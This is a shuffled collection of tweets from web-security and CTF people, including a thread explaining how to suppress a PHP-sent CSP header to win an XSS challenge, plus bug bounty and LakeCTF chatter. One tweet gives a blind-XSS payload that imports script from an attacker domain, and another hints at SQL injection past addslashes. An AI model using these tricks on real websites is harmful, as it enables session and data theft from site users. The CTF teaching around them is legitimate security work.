🧵[1/9] Time to publish the solution to this challenge! The goal of this challenge was to find an XSS while avoiding it being blocked by the CSP sent by the PHP header() function. Let's dive into it!
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks".
I've made a challenge about it, will you be able to pop an alert on ? The whole source code is in the screens below :)
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks".
I've made a challenge about it, will you be able to pop an alert on ? The whole source code is in the screens below :)
1) This is not a wordpress vulnerability, but a plugin's one
2) This is not a 0day, it's already been reported and fixed since September
3) If it was, you would be disclosing it unresponsibly
Yet, you received tons of likes and RT by straight up lying 🤡
Yay, I was awarded a $2000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
Big thanks to all absurd XSS black magic fuckeries I've seen in various CTFs, really helped be getting my exploit to work :D
Imagine creating a web chall using the sanitizer API, then Chrome just fucking removes it with its new release 3 days before the CTF starts 💀
Anyway, come play LakeCTF, it's this weekend and I've prepared 2 challenges for it :) (and go follow
@polygl0ts
!)
Haven't had this in the wild yet so don't know how useful of a tip this is, but adding a generic CSP bypass for your bxss payloads might be a good idea
x=("/%00"); setTimeout(()=>x.document.write("<img src=x onerror='import(\"//YourBXSSDomain\")'>"),999)
@terjanq
🧵[6/9] This means that if we have, for example, a request containing more than 1000 GET parameters, a warning will be sent, and the CSP header won't! Trying this solution () on remote, we can pop an alert!
I find pentesting Active Directory to be hard because of all of the tools, commands, and techniques you have to keep in mind, but
@orangecyberdef
's mindmap is very nice and it helped me a ton of times!
I can only recommend putting it in your bookmarks :)
Last year I cried over a
@PlaidCTF
web challenge all night while being super sleep-deprived... But this year, well exactly the same thing happened, but at least it's solved now 🫠
We've just launched a new topic on bypassing SameSite cookie restrictions! Learn how to evade browsers' cookie defences and perform successful cross-site attacks with our interactive labs:
After 7 years of service, I have to say goodbye to my old laptop and all of its stickers. Will definitely miss some of them.
Now is the time for me to start again on a fresh new one, good thing I had some left! :)
Awesome writeup by
@xanhacks
for my LakeCTF challenge GeoGuessy, including the two unintended as well as the intended solution!
Go check it out it's very nice :)
Write-up of the last Web challenge of
@LakeCtf
2023, which I was unable to solve during the competition.
🚩 Race conditions, XSS, and bypasses of client-side security to extract the GPS coordinates of the bot
🏆 Reliving the highlights of the Cybersecurity Rumble 2023!
Again, congratulations to our winners:
🥇 p0lyflag
🥈 __watermelon_chk_fail
🥉
@C_S_C_G
A big shoutout to all teams, volunteers and our amazing partners, you made this event unforgettable!
Until next year! 🚀
@terjanq
🧵[5/9] At this point, it is necessary to dive into php internals, and look for a way to create warnings before the php page code is executed. Looking at the http parameters processing, we can find that there are multiple cases where warnings are created, here are three examples:
Not a first blood, but hey at least I get the $100 swag card :p
Thanks for these cool challs
@hackthebox_eu
! Am enjoying them a lot :)
#OperationTinselTrace
@intigriti
Easy, unsubscribeUser is not defined. The dev forgot to include the necessary js code for this feature to work, making the company vulnerable to GDPR fines 😎
Day 33/33! That's a wrap for this semester! I'm really happy that I've been able to actually do it.
I've never had to put aside my hobbies for school, so doing it for uni wasn't easy, so I'm really proud of myself for achieving this :)
Now it's time to get back to fun things! :D
After around 20 days i've successfully completed the writeup for the last web chall of
@LakeCtf
finals. Even though i was not able to solve it, i've learned so much.
I would like to thank
@pilvar222
really much for dealing with me during all the process.
And that's a wrap for LakeCTF Quals 2023!
Congratulations to our 9 qualified teams!
🥇
@dicegangctf
🥈 ISITDTU
🥉
@fibonhack
See you all in Lausanne for the finals! 😄
PS: The 10th spot for the finals can still be won as the first prize of
@1ns0mn1h4ck
's CTF academic bracket!
🧵[3/9] This issue can be abused by forcing a page to send content before the header() function, thus preventing the presence of a potentially important security header. This has already been used in CTF challenges, notably in baby-csp by
@terjanq
@zeyu2001
The story repeats lol
Have the same feelings sometimes. Especially rwctf style challs where you need to find a 0day in a repo. Just feels like work it's not very enjoyable and it's tiring
@terjanq
🧵[7/9] This solution is only one among many. From the different solutions I've seen, some also used the maximum length of the parameters or files, and I wouldn't be surprised if many others are still unexplored ways to have warnings! In any case, big props to the solvers!
LakeCTF has officially started and will run for 24 hours ! Come and check out our challenges and try to qualify for the finals in Lausanne !
@ICepfl
#EPFLIC20
Excited to launch my first browser extension, DOMLogger++! Now available for both Firefox and Chromium! 🎉
DOMLogger++ allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations 🔥
Check it out 👇
1/5
Just discovered this version of DOM clobbering while reading
@Strellic_
's very cool write-up of his own challenge "AnalyticalEngine" . Can't wait to see the new challenges he made for corCTF 2022! 😁
Additional notes:
- here's my solution md5 hash (will release this weekend): f3512c46daf0431d3567c2f21ef82f60
- if you solved it, please DM me and don't comment your solution :)
- the intended is not a 0day, please don't submit me yours 😅
- solvers get credits + a drink from me!
@OctagonNetworks
The fumction is only used to prepend backslashes to certain characters such as quotes. However, here, you don't need these to continue the query, you can simply uses spaces, subqueried, etc...
I love programs like these!
Compensate for efforts put into a duplicate is probably the best way a program can show its consideration for its hackers ❤️
(Also helps us keeping sanity 😅)
#BugBounty
If you (or someone who you know) wants to do a Security internship at
@google
Zurich, the application form is now up:
Interns at Google Security work on real cool stuff, so I highly recommend it. Hit me up if you have any questions.
#intern
#security
@garlic0ne
It's the default port for Burp Suite's proxy, so either the chall or the proxy fails to run until you change and restart it, which is quite annoying 😅
🧵[2/9] Depending on the configuration, PHP is not able to modify the headers of a response once the body has a certain amount of characters in it. This is the buffering setting, which is usually set to 4096 characters, or in the case of the php:apache image, simply disabled.
The idea behind this is not to bypass js execution-related csp but more for the ones that prevent connection to external domains. Usually servers and proxies won't like the %00 in the url and error out before even adding the csp header. You can execute your payload in this window
@terjanq
🧵[4/9] However, this technique has certain limitations. It requires either sending data before header() via functions such as echo, or to have warnings created by the code before header() while display_errors is enabled. This challenge requires us to surpass these limitations.
@albinowax
If you're still looking for some ideas, I recently learned about TLS poisoning, and I think it could have more potential by digging further! :)
@joshmdx
, the researcher that discovered this, had some suggestions here: (timecode). Good luck! :D